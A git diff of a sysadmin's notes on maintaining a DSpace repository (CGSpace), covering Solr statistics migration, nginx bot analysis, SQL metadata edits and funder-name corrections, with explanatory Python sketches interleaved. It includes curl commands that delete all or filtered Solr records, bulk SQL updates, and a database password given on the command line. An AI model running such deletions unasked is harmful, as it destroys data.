                 at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
                 at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
        @@ -425,17 +425,17 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
         
    -
    $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f '(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)'
    -$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
    +
    $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f '(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)'
    +$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
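The filter query used in the export and delete commands selects records whose `id` is neither a 36-character (UUID-length) string nor already suffixed with `-unmigrated`. A minimal Python sketch of the same predicate, assuming Lucene's whole-term regular expression matching (hence `re.fullmatch`); the function name and the sample IDs are hypothetical:

```python
import re

# Lucene regular expressions match the whole term, so fullmatch() is the
# closest Python equivalent of id:/.{36}/ and id:/.+-unmigrated/.
UUID_LENGTH = re.compile(r".{36}")
UNMIGRATED = re.compile(r".+-unmigrated")


def is_leftover(record_id: str) -> bool:
    """Return True if the record would match the export/delete filter."""
    return not UUID_LENGTH.fullmatch(record_id) and not UNMIGRATED.fullmatch(record_id)


if __name__ == "__main__":
    # Hypothetical sample IDs: a migrated UUID, a legacy integer, a marked record.
    for sample in ["7b5b3900-28e8-417f-9c1c-e7d88a753221", "10", "10-unmigrated"]:
        print(sample, is_leftover(sample))
```

Only the legacy integer ID is selected here, which is the kind of record the commands above export and then delete.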
     
    • Now the UUID conversion script says there is nothing left to convert, so I can try to run the Atmire CUA conversion utility:
    -
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
     $ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 1
     
    • The processing is very slow and there are lots of errors like this:
    -
    Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn't be processed
    +
    Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn't be processed
     com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
    diff --git a/docs/2020-06/index.html b/docs/2020-06/index.html
    index 596eeea4e..3ae6e37fb 100644
    --- a/docs/2020-06/index.html
    +++ b/docs/2020-06/index.html
    @@ -36,7 +36,7 @@ I sent Atmire the dspace.log from today and told them to log into the server to
     In other news, I checked the statistics API on DSpace 6 and it’s working
     I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
     "/>
    -
    +
     
     
         
    @@ -161,8 +161,8 @@ java.lang.NullPointerException
     
     
     
    -
    $ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<delete><query>*:*</query></delete>'
    -$ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<commit />'
    +
    $ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<delete><query>*:*</query></delete>'
    +$ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<commit />'
     $ ~/dspace63/bin/dspace oai import
     OAI 2.0 manager action started
     ...
    @@ -279,7 +279,7 @@ sys     3m13.929s
     
  • In theory we can have different languages for metadata fields but in practice we don’t do that, so we might as well normalize everything to “en_US” (and perhaps I should make a curation task to do this)
  • For now I will do it manually on CGSpace and DSpace Test:
  • -
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2;
    +
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2;
     UPDATE 2414738
     
    -
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
    +
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
     
    • Peter asked if it was possible to find all ILRI items that have “zoonoses” or “zoonotic” in their titles and check if they have the ILRI subject “ZOONOTIC DISEASES” (and add it if not)
        @@ -320,7 +320,7 @@ UPDATE 2414738
      $ dspace metadata-export -i 10568/1 -f /tmp/2020-06-08-ILRI.csv
      -$ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-ILRI.csv > /tmp/ilri.csv
      +$ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-ILRI.csv > /tmp/ilri.csv
       
      • Moayad asked why he’s getting HTTP 500 errors on CGSpace
          @@ -329,7 +329,7 @@ $ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-I
      -
      # journalctl --since=today -u tomcat7  | grep -c 'Internal Server Error'
      +
      # journalctl --since=today -u tomcat7  | grep -c 'Internal Server Error'
       482
       
      • They are all related to the REST API, like:
      • @@ -366,12 +366,12 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
      • Looking back, I see ~800 of these errors since I changed the database configuration last week:
      -
      # journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
      +
      # journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
       795
       
      • And only ~280 in the entire month before that…
      -
      # journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
      +
      # journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
       286
       
      • So it seems to be related to the database, perhaps because there are fewer connections in the pool?
      @@ -394,7 +394,7 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
      • Looking at the nginx access logs I see that, other than something that seems like Google Feedburner, all hosts using this user agent are in Sweden!
      -
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | grep -v '/feed' | awk '{print $1}' | sort | uniq -c | sort -n
      +
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | grep -v '/feed' | awk '{print $1}' | sort | uniq -c | sort -n
          1624 192.36.136.246
          1627 192.36.241.95
          1629 192.165.45.204
      @@ -480,7 +480,7 @@ Total number of bot hits purged: 29025
       
    -
    172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] "GET /rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=0 HTTP/1.1" 403 260 "-" "-"
    +
    172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] "GET /rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=0 HTTP/1.1" 403 260 "-" "-"
     
    • I created an nginx map based on the host’s IP address that sets a temporary user agent (ua) and then changed the conditional in the REST API location block so that it checks this mapped ua instead of the default one
        @@ -497,11 +497,11 @@ Total number of bot hits purged: 29025
    -
    $ curl -s 'https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections' 'https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections' | grep -oE '10568/[0-9]+' | sort | uniq > /tmp/cip-collections.txt
    +
    $ curl -s 'https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections' 'https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections' | grep -oE '10568/[0-9]+' | sort | uniq > /tmp/cip-collections.txt
     
    • Then I formatted it into a SQL query and exported a CSV:
    -
    dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM handle WHERE handle IN ('10568/100533', '10568/100653', '10568/101955', '10568/106580', '10568/108469', '10568/51671', '10568/53085', '10568/53086', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/53093', '10568/53094', '10568/64874', '10568/69069', '10568/70150', '10568/88229', '10568/89346', '10568/89347', '10568/99301', '10568/99302', '10568/99303', '10568/99304', '10568/99428'))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
    +
    dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM handle WHERE handle IN ('10568/100533', '10568/100653', '10568/101955', '10568/106580', '10568/108469', '10568/51671', '10568/53085', '10568/53086', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/53093', '10568/53094', '10568/64874', '10568/69069', '10568/70150', '10568/88229', '10568/89346', '10568/89347', '10568/99301', '10568/99302', '10568/99303', '10568/99304', '10568/99428'))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
     COPY 3917
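The two steps above (collecting the collection handles, then turning them into a SQL `IN` list) could be sketched in Python as follows. This is only an illustration: the function names and the sample text are hypothetical, and the regular expression mirrors the `grep -oE '10568/[0-9]+'` pattern used earlier.

```python
from __future__ import annotations

import re

# Same pattern as the grep -oE expression in the curl pipeline.
HANDLE_PATTERN = re.compile(r"10568/[0-9]+")


def extract_handles(text: str) -> list[str]:
    """Return the unique handles found in text, in sorted order (like sort | uniq)."""
    return sorted(set(HANDLE_PATTERN.findall(text)))


def sql_in_list(handles: list[str]) -> str:
    """Format handles as a quoted, comma-separated list for a SQL IN clause."""
    return ", ".join(f"'{handle}'" for handle in handles)


if __name__ == "__main__":
    # Hypothetical stand-in for the REST API response body.
    sample = '{"handle":"10568/89346"} {"handle":"10568/51671"} {"handle":"10568/89346"}'
    print(sql_in_list(extract_handles(sample)))
```

The resulting string can be pasted between the parentheses of the `IN (...)` clause; for untrusted input a parameterized query would be the safer choice.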
     

    2020-06-15

    -
    $ http 'https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&mailto=a.orth@cgiar.org'
    +
    $ http 'https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&mailto=a.orth@cgiar.org'
     
    • Searching for “Bill and Melinda Gates” we can see the name literal and a list of alt-names literals
        @@ -697,14 +697,14 @@ SUSTAIN AGRICULTURAL INNOVATIONS NATIVE VARIETIES PHYTOPHTHORA INFESTANS
        -$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -m 127 -d
        +$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -m 127 -d
    • She also wants to change their SWEET POTATOES term to SWEETPOTATOES, both in the CIP subject list and existing items so I updated those too:
    $ cat /tmp/2020-06-30-fix-cip-subjects.csv 
     cg.subject.cip,correct
     SWEET POTATOES,SWEETPOTATOES
    -$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127 -d
    +$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127 -d
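For illustration, the correction CSV above is simply a two-column mapping from the current value to its replacement. The sketch below applies such a mapping to an in-memory list of values. It is not the `fix-metadata-values.py` script itself (which works against the database), and the function names are hypothetical.

```python
from __future__ import annotations

import csv
import io


def load_corrections(csv_text: str, from_field: str, to_field: str) -> dict[str, str]:
    """Read a corrections CSV and map each original value to its replacement."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {row[from_field]: row[to_field] for row in reader}


def apply_corrections(values: list[str], corrections: dict[str, str]) -> list[str]:
    """Replace values that have a correction; leave all others untouched."""
    return [corrections.get(value, value) for value in values]


if __name__ == "__main__":
    csv_text = "cg.subject.cip,correct\nSWEET POTATOES,SWEETPOTATOES\n"
    corrections = load_corrections(csv_text, "cg.subject.cip", "correct")
    print(apply_corrections(["SWEET POTATOES", "POTATOES"], corrections))
```

Matching is exact, so a value such as `POTATOES` is left alone even though it is a substring of a corrected term.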
     
    • She also finished doing all the corrections to authors that I had sent her last week, but many of the changes are removing Spanish accents from authors’ names so I asked if she’s really sure she wants to do that
    • I ran the fixes and deletes on CGSpace, but not on DSpace Test yet because those scripts need updating for DSpace 6 UUIDs
    • @@ -712,63 +712,63 @@ $ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u
    $ cat 2020-06-29-fix-sponsors.csv
     dc.description.sponsorship,correct
    -"Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil","Conselho Nacional de Desenvolvimento Científico e Tecnológico"
    -"Claussen Simon Stiftung","Claussen-Simon-Stiftung"
    -"Fonds pour la formation á la Recherche dans l'Industrie et dans l'Agriculture, Belgium","Fonds pour la Formation à la Recherche dans l’Industrie et dans l’Agriculture"
    -"Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    -"Schlumberger Foundation Faculty for the Future","Schlumberger Foundation"
    -"Wildlife Conservation Society, United States","Wildlife Conservation Society"
    -"Portuguese Foundation for Science and Technology","Portuguese Science and Technology Foundation"
    -"Wageningen University and Research","Wageningen University and Research Centre"
    -"Leverhulme Centre for Integrative Research in Agriculture and Health","Leverhulme Centre for Integrative Research on Agriculture and Health"
    -"Natural Science and Engineering Research Council of Canada","Natural Sciences and Engineering Research Council of Canada"
    -"Biotechnology and Biological Sciences Research Council, United Kingdom","Biotechnology and Biological Sciences Research Council"
    -"Home Grown Ceraels Authority United Kingdom","Home-Grown Cereals Authority"
    -"Fiat Panis Foundation","Foundation fiat panis"
    -"Defence Science and Technology Laboratory, United Kingdom","Defence Science and Technology Laboratory"
    -"African Development Bank","African Development Bank Group"
    -"Ministry of Health, Labour, and Welfare, Japan","Ministry of Health, Labour and Welfare"
    -"World Academy of Sciences","The World Academy of Sciences"
    -"Agricultural Research Council, South Africa","Agricultural Research Council"
    -"Department of Homeland Security, USA","U.S. Department of Homeland Security"
    -"Quadram Institute","Quadram Institute Bioscience"
    -"Google.org","Google"
    -"Department for Environment, Food and Rural Affairs, United Kingdom","Department for Environment, Food and Rural Affairs, UK Government"
    -"National Commission for Science, Technology and Innovation, Kenya","National Commission for Science, Technology and Innovation"
    -"Hainan Province Natural Science Foundation of China","Natural Science Foundation of Hainan Province"
    -"German Society for International Cooperation (GIZ)","GIZ"
    -"German Federal Ministry of Food and Agriculture","Federal Ministry of Food and Agriculture"
    -"State Key Laboratory of Environmental Geochemistry, China","State Key Laboratory of Environmental Geochemistry"
    -"QUT student scholarship","Queensland University of Technology"
    -"Australia Centre for International Agricultural Research","Australian Centre for International Agricultural Research"
    -"Belgian Science Policy","Belgian Federal Science Policy Office"
    -"U.S. Department of Agriculture USDA","U.S. Department of Agriculture"
    -"U.S.. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    -"Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    -"Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil","Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul"
    -"Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil","Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro"
    -"Swedish University of Agricultural Sciences (SLU)","Swedish University of Agricultural Sciences"
    -"U.S. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    -"Swedish International Development Cooperation Agency (Sida)","Sida"
    -"Swedish International Development Agency","Sida"
    -"Federal Ministry for Economic Cooperation and Development, Germany","Federal Ministry for Economic Cooperation and Development"
    -"Natural Environment Research Council, United Kingdom","Natural Environment Research Council"
    -"Economic and Social Research Council, United Kingdom","Economic and Social Research Council"
    -"Medical Research Council, United Kingdom","Medical Research Council"
    -"Federal Ministry for Education and Research, Germany","Federal Ministry for Education, Science, Research and Technology"
    -"UK Government’s Department for International Development","Department for International Development, UK Government"
    -"Department for International Development, United Kingdom","Department for International Development, UK Government"
    -"United Nations Children's Fund","United Nations Children's Emergency Fund"
    -"Swedish Research Council for Environment, Agricultural Science and Spatial Planning","Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning"
    -"Agence Nationale de la Recherche, France","French National Research Agency"
    -"Fondation pour la recherche sur la biodiversité","Foundation for Research on Biodiversity"
    -"Programa Nacional de Innovacion Agraria, Peru","Programa Nacional de Innovación Agraria, Peru"
    -"United States Agency for International Development (USAID)","United States Agency for International Development"
    -"West Africa Agricultural Productivity Programme","West Africa Agricultural Productivity Program"
    -"West African Agricultural Productivity Project","West Africa Agricultural Productivity Program"
    -"Rural Development Administration, Republic of Korea","Rural Development Administration"
    -"UK’s Biotechnology and Biological Sciences Research Council (BBSRC)","Biotechnology and Biological Sciences Research Council"
    -$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
    +"Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil","Conselho Nacional de Desenvolvimento Científico e Tecnológico"
    +"Claussen Simon Stiftung","Claussen-Simon-Stiftung"
    +"Fonds pour la formation á la Recherche dans l'Industrie et dans l'Agriculture, Belgium","Fonds pour la Formation à la Recherche dans l’Industrie et dans l’Agriculture"
    +"Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    +"Schlumberger Foundation Faculty for the Future","Schlumberger Foundation"
    +"Wildlife Conservation Society, United States","Wildlife Conservation Society"
    +"Portuguese Foundation for Science and Technology","Portuguese Science and Technology Foundation"
    +"Wageningen University and Research","Wageningen University and Research Centre"
    +"Leverhulme Centre for Integrative Research in Agriculture and Health","Leverhulme Centre for Integrative Research on Agriculture and Health"
    +"Natural Science and Engineering Research Council of Canada","Natural Sciences and Engineering Research Council of Canada"
    +"Biotechnology and Biological Sciences Research Council, United Kingdom","Biotechnology and Biological Sciences Research Council"
    +"Home Grown Ceraels Authority United Kingdom","Home-Grown Cereals Authority"
    +"Fiat Panis Foundation","Foundation fiat panis"
    +"Defence Science and Technology Laboratory, United Kingdom","Defence Science and Technology Laboratory"
    +"African Development Bank","African Development Bank Group"
    +"Ministry of Health, Labour, and Welfare, Japan","Ministry of Health, Labour and Welfare"
    +"World Academy of Sciences","The World Academy of Sciences"
    +"Agricultural Research Council, South Africa","Agricultural Research Council"
    +"Department of Homeland Security, USA","U.S. Department of Homeland Security"
    +"Quadram Institute","Quadram Institute Bioscience"
    +"Google.org","Google"
    +"Department for Environment, Food and Rural Affairs, United Kingdom","Department for Environment, Food and Rural Affairs, UK Government"
    +"National Commission for Science, Technology and Innovation, Kenya","National Commission for Science, Technology and Innovation"
    +"Hainan Province Natural Science Foundation of China","Natural Science Foundation of Hainan Province"
    +"German Society for International Cooperation (GIZ)","GIZ"
    +"German Federal Ministry of Food and Agriculture","Federal Ministry of Food and Agriculture"
    +"State Key Laboratory of Environmental Geochemistry, China","State Key Laboratory of Environmental Geochemistry"
    +"QUT student scholarship","Queensland University of Technology"
    +"Australia Centre for International Agricultural Research","Australian Centre for International Agricultural Research"
    +"Belgian Science Policy","Belgian Federal Science Policy Office"
    +"U.S. Department of Agriculture USDA","U.S. Department of Agriculture"
    +"U.S.. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    +"Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    +"Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil","Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul"
    +"Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil","Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro"
    +"Swedish University of Agricultural Sciences (SLU)","Swedish University of Agricultural Sciences"
    +"U.S. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    +"Swedish International Development Cooperation Agency (Sida)","Sida"
    +"Swedish International Development Agency","Sida"
    +"Federal Ministry for Economic Cooperation and Development, Germany","Federal Ministry for Economic Cooperation and Development"
    +"Natural Environment Research Council, United Kingdom","Natural Environment Research Council"
    +"Economic and Social Research Council, United Kingdom","Economic and Social Research Council"
    +"Medical Research Council, United Kingdom","Medical Research Council"
    +"Federal Ministry for Education and Research, Germany","Federal Ministry for Education, Science, Research and Technology"
    +"UK Government’s Department for International Development","Department for International Development, UK Government"
    +"Department for International Development, United Kingdom","Department for International Development, UK Government"
    +"United Nations Children's Fund","United Nations Children's Emergency Fund"
    +"Swedish Research Council for Environment, Agricultural Science and Spatial Planning","Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning"
    +"Agence Nationale de la Recherche, France","French National Research Agency"
    +"Fondation pour la recherche sur la biodiversité","Foundation for Research on Biodiversity"
    +"Programa Nacional de Innovacion Agraria, Peru","Programa Nacional de Innovación Agraria, Peru"
    +"United States Agency for International Development (USAID)","United States Agency for International Development"
    +"West Africa Agricultural Productivity Programme","West Africa Agricultural Productivity Program"
    +"West African Agricultural Productivity Project","West Africa Agricultural Productivity Program"
    +"Rural Development Administration, Republic of Korea","Rural Development Administration"
    +"UK’s Biotechnology and Biological Sciences Research Council (BBSRC)","Biotechnology and Biological Sciences Research Council"
    +$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
     
    • Then I started a full re-index at batch CPU priority:
    @@ -784,9 +784,9 @@ sys 2m56.635s
    -
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
     $ dspace metadata-export -i 10568/1 -f /tmp/ilri.cs
    -$ csvcut -c 'id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]' /tmp/ilri.csv > /tmp/ilri-covid19.csv
    +$ csvcut -c 'id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]' /tmp/ilri.csv > /tmp/ilri-covid19.csv
     
    • I see that all items with “COVID19” already have “CORONAVIRUS DISEASE” so I don’t need to do anything
    diff --git a/docs/2020-07/index.html b/docs/2020-07/index.html
    index 54708553a..83ff4767c 100644
    --- a/docs/2020-07/index.html
    +++ b/docs/2020-07/index.html
    @@ -38,7 +38,7 @@ I restarted Tomcat and PostgreSQL and the issue was gone
     Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter’s request
     "/>
    -
    +
    @@ -139,7 +139,7 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
  • Also, Linode is alerting that we had high outbound traffic rate early this morning around midnight AND high CPU load later in the morning
  • First looking at the traffic in the morning:
  • -
    # cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E "01/Jul/2020:(00|01|02|03|04)" | goaccess --log-format=COMBINED -
    +
    # cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E "01/Jul/2020:(00|01|02|03|04)" | goaccess --log-format=COMBINED -
     ...
     9659 33.56%    1  0.08% 340.94 MiB 64.39.99.13
     3317 11.53%    1  0.08% 871.71 MiB 199.47.87.140
    @@ -153,8 +153,8 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
     
  • I will purge hits from that IP from Solr
  • The 199.47.87.x IPs belong to Turnitin, and apparently they are NOT marked as bots and we have 40,000 hits from them in 2020 statistics alone:
  • -
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Turnitin.*/&rows=0" | grep -oE 'numFound="[0-9]+"'
    -numFound="41694"
    +
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Turnitin.*/&rows=0" | grep -oE 'numFound="[0-9]+"'
    +numFound="41694"
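The hit count is read straight out of Solr's XML response. A small Python sketch of that extraction step, assuming a response body that contains a `numFound` attribute as in the output above (the function name and the sample response string are hypothetical):

```python
import re
from typing import Optional

# Same expression as the grep -oE pattern, with a capture group for the number.
NUM_FOUND = re.compile(r'numFound="([0-9]+)"')


def parse_num_found(response_body: str) -> Optional[int]:
    """Return the numFound value from a Solr XML response, or None if absent."""
    match = NUM_FOUND.search(response_body)
    return int(match.group(1)) if match else None


if __name__ == "__main__":
    # Hypothetical fragment of a Solr XML response.
    sample = '<result name="response" numFound="41694" start="0"></result>'
    print(parse_num_found(sample))
```

Returning `None` for a missing attribute keeps a failed request distinguishable from a genuine count of zero.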
     
    • They used to be “TurnitinBot”… hhmmmm, seems they use both: https://turnitin.com/robot/crawlerinfo.html
    • I will add Turnitin to the DSpace bot user agent list, but I see they are requesting robots.txt and only requesting item pages, so that’s impressive! I don’t need to add them to the “bad bot” rate limit list in nginx
    • @@ -164,9 +164,9 @@ numFound="41694"
    • The IPs all belong to HostRoyale:
    -
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | wc -l
    +
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | wc -l
     81
    -# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | sort -h
    +# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | sort -h
     185.152.250.1
     185.152.250.101
     185.152.250.103
    @@ -269,7 +269,7 @@ numFound="41694"
     
  • I purged 20,000 hits from IPs and 45,000 hits from user agents
  • I will revert the default “example” agents file back to the upstream master branch of COUNTER-Robots, and then add all my custom ones that are pending in pull requests they haven’t merged yet:
  • -
    $ diff --unchanged-line-format= --old-line-format= --new-line-format='%L' dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
    +
    $ diff --unchanged-line-format= --old-line-format= --new-line-format='%L' dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
     Citoid
     ecointernet
     GigablastOpenSource
    @@ -285,7 +285,7 @@ Typhoeus
     
    • Just a note that I still can’t deploy the 6_x-dev-atmire-modules branch as it fails at ant update:
    -
         [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'DefaultStorageUpdateConfig': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cuaEPersonStorageReportService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
    +
         [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'DefaultStorageUpdateConfig': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cuaEPersonStorageReportService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: 